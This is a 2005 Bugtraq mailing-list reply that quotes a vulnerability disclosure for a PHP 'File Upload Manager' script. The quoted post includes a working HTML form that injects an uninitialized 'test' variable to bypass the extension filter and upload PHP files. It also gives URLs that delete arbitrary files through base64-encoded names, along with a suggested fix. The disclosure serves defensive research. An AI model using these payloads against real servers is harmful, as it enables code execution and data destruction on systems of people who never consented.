Re: File Upload Manager Sploits

To: "blackshoe@xxxxxxxxx" <blackshoe@xxxxxxxxx>
Subject: Re: File Upload Manager Sploits
From: <systemcracker@xxxxxxxxx>
Date: Wed, 15 Jun 2005 16:29:47 +0100
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=FG5FxYsB7Zj8KKPvxbru5UY7+V7HMV41VpRKX2Hq/qYAxtFzuLx7xuts6hPshFAag9IKaVpgTRy9I+JNDBWidgiNdsIB6cPN2g3qRm9Irzur7UNv561ODMSnxeAfv1uA15mPjHIx+Rl0tL10SFFfjvHZqczng2wbp3QEe8w4IyM=
In-reply-to: <20050612222245.19472.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20050612222245.19472.qmail@xxxxxxxxxxxxxxxxx>
Reply-to: <systemcracker@xxxxxxxxx>

after some digging on google, I've found that this refers to the "File
Upload Manager" at
http://www.mtnpeak.net/webdev/index.php?pg=php
rather than any number of other File Upload Managers. It's a common
name, please include a url or at least vendor name in future.

On 12 Jun 2005 22:22:45 -0000, blackshoe@xxxxxxxxx <blackshoe@xxxxxxxxx> wrote:
> Below is some code for a recent unpatched exploit for file managers using php 
> as the base code. Share this with the world and help protect.
> 
> File Upload Manager - Bypass File Extension and Arbitrary File Delete
> nothing to see here @ hackthissite.org
> 
> Through an input validation flaw, users are able to upload files that are not 
> on the approve extension list. This can potentially allow users to upload 
> .php files and gain permissions of the web server to execute commands and 
> scripts.
> 
> The code that checks for invalid file extensions makes use of an 
> uninitialized variable which you can inject values into:
> 
>         for($i=0;$i<count($file_ext_allow);$i++)
>                 {
>                         if (getlast($fileupload_name)!=$file_ext_allow[$i])
>                                 $test.="~~";
>                 }
>                 $exp=explode("~~",$test);
> 
>                 if (count($exp)==(count($file_ext_allow)+1))
>                 { // (do not upload) } else { // (upload) }
> 
> With each mismatch, they add '~~' to the variable 'test' and then compare it 
> to the count of the original valid file extensions array.
> 
> Users can create an html form with an extra form variable 'test' with the 
> value of '~~~~~~' which will allow you to bypass the extension validation:
> 
> <form method="post" enctype="multipart/form-data" 
> action="http://www.asdf.com/url/to/fileuploader/index.php";>
> file: <input type="file" name="fileupload" class="textfield" size="30">
> exxploitz: <input type="text" name="test" class="textfield" size="46" 
> value="~~~~~~">
> <input type="submit" value="upload" class="button">
> </form>
> 
> Fix: Use php's in_array() function to check to see if an extension is in the 
> valid list.
> 
> 
> In an unrelated flaw, users are able to delete arbitrary files on the 
> webserver by not checking authentication before passing it to delete 
> functions.
> 
> url to view a file: /index.php?act=view&file=d2VlLnBocC50eHQ=
> url to delete the same file: /index.php?act=del&file=d2VlLnBocC50eHQ=
> 
> to choose what file to delete, just do base64_encode("filename");
> 


-- 
Computing tools, PHP code, online tools and more at http://www.puremango.co.uk

References:
- File Upload Manager Sploits
  - From: blackshoe

Prev by Date: Re: File Upload Manager Sploits
Next by Date: Vulnerability: McGallery v 1.1 files reading on disk
Previous by thread: File Upload Manager Sploits
Next by thread: Re: File Upload Manager Sploits
Index(es):
- Date
- Thread